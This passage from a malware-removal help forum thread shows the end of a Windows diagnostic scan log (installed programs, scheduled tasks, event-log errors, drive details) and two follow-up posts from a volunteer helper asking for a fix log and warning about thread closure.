Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
GoToMeeting 6.4.5.1865 (HKCU\...\GoToMeeting) (Version: 6.4.5.1865 - CitrixOnline)
Hewlett-Packard ACLM.NET v1.2.2.3 (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Setup (HKLM\...\{1E6219D4-027E-47EE-AB83-DD2F26E31A32}) (Version: 1.2.3557.3169 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.4.0 - Hewlett-Packard)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{5FEBF468-5AC2-4C66-AD80-DF85C085AA73}) (Version: 8.5.10.36 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.5.10.36 - InterVideo Inc.) Hidden
Kyocera Scanner File Utility (HKLM\...\{61C79AE1-5403-4687-AC68-28BFA5EF3895}) (Version: 3.16.9 - KyoceraMita)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Browser Protection Service (HKLM\...\McAfee SiteAdvisor) (Version: 2.5.0.6173 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Basic 2007 (HKLM\...\BASICR) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDF Complete Special Edition (HKLM\...\PDF Complete) (Version: 3.5.109 - PDF Complete, Inc)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Sophos Virus Removal Tool (HKLM\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.3 - Sophos Limited)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
WordPerfect Office 11 (HKLM\...\{54F90B55-BEB3-4F0D-8802-228822FA5921}) (Version: 11.0 - Corel Corporation)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
28-10-2014 13:40:22 ComboFix created restore point
03-11-2014 21:59:10 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2014-10-28 08:22 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0C92239F-3E49-499D-9AF1-C4B116AD46BB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {21866111-A928-4F98-AF0C-EEAE9A8E1996} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {67385F60-249C-4354-ADD2-620471A359CC} - System32\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001 => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-27] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {7375CCFD-6B94-41ED-961E-F6F9C08DAFA6} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {7F504C59-599B-49DA-A3EE-B859AC0BF85C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {87C410B8-33B3-45C6-B500-AD9A206C9502} - System32\Tasks\HPCeeScheduleForKELI => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {8A443DB3-B5C1-48D7-B440-F451210C0D61} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-06] ()
Task: {AB8E1262-14E5-4EA0-9F63-97672EDA7F30} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {EA69A0AE-1152-488A-9731-1437A029D2F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForKELI.job => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Loaded Modules (whitelisted) =============
 
2010-10-16 11:15 - 2010-10-16 11:15 - 00341280 _____ () C:\Program Files\SiteAdvisor\6173\SAService.exe
2010-10-16 11:07 - 2009-07-24 14:29 - 00077824 _____ () C:\Program Files\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2010-10-16 11:15 - 2007-08-28 15:07 - 00036640 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
2010-10-16 11:15 - 2007-08-28 15:06 - 00910624 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.dll
2011-03-24 19:16 - 2000-11-09 10:17 - 00190464 _____ () C:\Program Files\Kyocera\FileUtility\HgTiff2Pdf.dll
2014-11-06 08:43 - 2014-11-06 08:43 - 00043008 _____ () c:\users\keli\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpz1liyd.dll
2013-08-23 14:01 - 2013-08-23 14:01 - 25100288 _____ () C:\Users\KELI\AppData\Roaming\Dropbox\bin\libcef.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-10-28 08:38 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3621039740-3434257137-3815352865-500 - Administrator - Disabled)
Guest (S-1-5-21-3621039740-3434257137-3815352865-501 - Limited - Enabled)
KELI (S-1-5-21-3621039740-3434257137-3815352865-1001 - Administrator - Enabled) => C:\Users\KELI
McAfeeMVSUser (S-1-5-21-3621039740-3434257137-3815352865-1000 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/05/2014 01:03:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/04/2014 00:40:35 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/30/2014 08:52:10 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/29/2014 09:25:54 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/27/2014 05:52:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/27/2014 03:21:19 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 03:21:19 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 03:21:19 PM) (Source: VSS) (EventID: 18) (User: )
Description: Volume Shadow Copy Service error: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started during Safe Mode.
The Volume Shadow Copy service cannot start while in safe mode. [0x8007043c, This service cannot be started in Safe Mode
]
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 03:17:20 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 03:17:20 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
 
System errors:
=============
Error: (11/06/2014 08:43:52 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/06/2014 08:39:51 AM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/06/2014 08:37:33 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/05/2014 09:12:16 AM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/05/2014 09:09:44 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/04/2014 00:33:17 PM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/03/2014 04:59:50 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The EngineServer service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/02/2014 00:33:15 PM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/01/2014 06:59:25 PM) (Source: Microsoft-Windows-TBS) (EventID: 16385) (User: NT AUTHORITY)
Description: An internal TBS error was detected.  The error code was 0x8007001f.  This is usually caused by unexpected TPM or driver behavior and may be transient.
 
Error: (11/01/2014 06:59:25 PM) (Source: Microsoft-Windows-TBS) (EventID: 516) (User: NT AUTHORITY)
Description: An error occurred while communicating with the TPM.  The driver returned 0x8007001f.
 
 
Microsoft Office Sessions:
=========================
Error: (09/17/2013 11:57:00 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1955 seconds with 600 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:34 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:24 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:04 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:42 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 8 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 9 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:03 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 25 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
==================== Memory info =========================== 
 
Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 49%
Total physical RAM: 1993.25 MB
Available physical RAM: 996.73 MB
Total Pagefile: 3986.49 MB
Available Pagefile: 2840.71 MB
Total Virtual: 2047.88 MB
Available Virtual: 1899.4 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:139.55 GB) (Free:99.9 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:7.49 GB) (Free:0.86 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 149.1 GB) (Disk ID: 3B723303)
Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=139.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=7.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#14 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 06 November 2014 - 12:34 PM

Please post the Fixlog.txt as well... :)
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#15 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 09 November 2014 - 12:04 PM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users